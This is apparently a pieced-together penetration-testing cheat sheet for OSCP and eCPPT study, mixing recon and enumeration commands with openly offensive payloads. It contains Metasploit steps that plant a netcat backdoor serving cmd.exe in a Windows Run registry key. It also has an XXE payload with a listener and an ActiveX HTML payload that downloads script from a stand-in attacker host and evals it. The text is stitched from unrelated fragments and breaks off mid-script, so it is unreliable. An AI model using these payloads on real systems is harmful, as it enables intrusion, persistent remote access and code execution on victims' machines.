OSCP Handy Commands
Nmap Full Web Vulnerable Scan:
mkdir /usr/share/nmap/scripts/vulscan
cd /usr/share/nmap/scripts/vulscan
wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
## msf netcat backdoor in persistence
- netcat is included in metasploit
-
- upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 ## must have system rights
-
-
- ## registry key adding
- echo reg enumkey -k HKLM\\Software\\microsoft\\windows\\currentversion\\run
- echo reg setval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'
- echo reg queryval -k HKLM\\Software\\microsoft\\windows\\currentversion\\run -v nc
eCPPT NETWORK SECURITY
*DNS Enumeration
nslookup example.com
nslookup -query=mx domain
nslookup -query=ns domain
nslookup -query=any domain
interactive mode {
How to pass the OSCP
Recon
Find vuln
Exploit
Document it
Recon
Unicornscans in cli, nmap in msfconsole to help store loot in database.
TCP
unicornscan -i tap0 -I -mT $IP:a
Penetration Testing/Assessment Workflow & other fun infosec stuff
https://github.com/jivoi/pentest
My feeble attempt to organize (in a somewhat logical fashion) the vast amount of information, tools, resources, tips and tricks surrounding penetration testing, vulnerability assessment, and information security as a whole*
Reconnaissance
Passive/Semi-Passive
Tools
Discover - https://github.com/leebaird/discover
FROM ubuntu:16.04
RUN apt update ; \
apt install -y git apache2
RUN mkdir /srv/git
COPY git-http.conf .
RUN cat git-http.conf >> /etc/apache2/apache2.conf
#!/usr/bin/env python
from __future__ import print_function
import socket
# Minimal TCP listener used as the out-of-band endpoint for an XXE test
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('0.0.0.0', 2121))
s.listen(1)
print('XXE-FTP listening ')
conn, addr = s.accept()
print('Connected by %s' % (addr,))
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
// Determine linux distribution and version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
// Determine kernel version - 32 or 64-bit?
cat /proc/version
uname -a
uname -mrs
<!DOCTYPE html><html><head><title>Click Me</title></head><body>
This is a demo ! <br>
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',rundll32.exe,javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://attacker.site/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();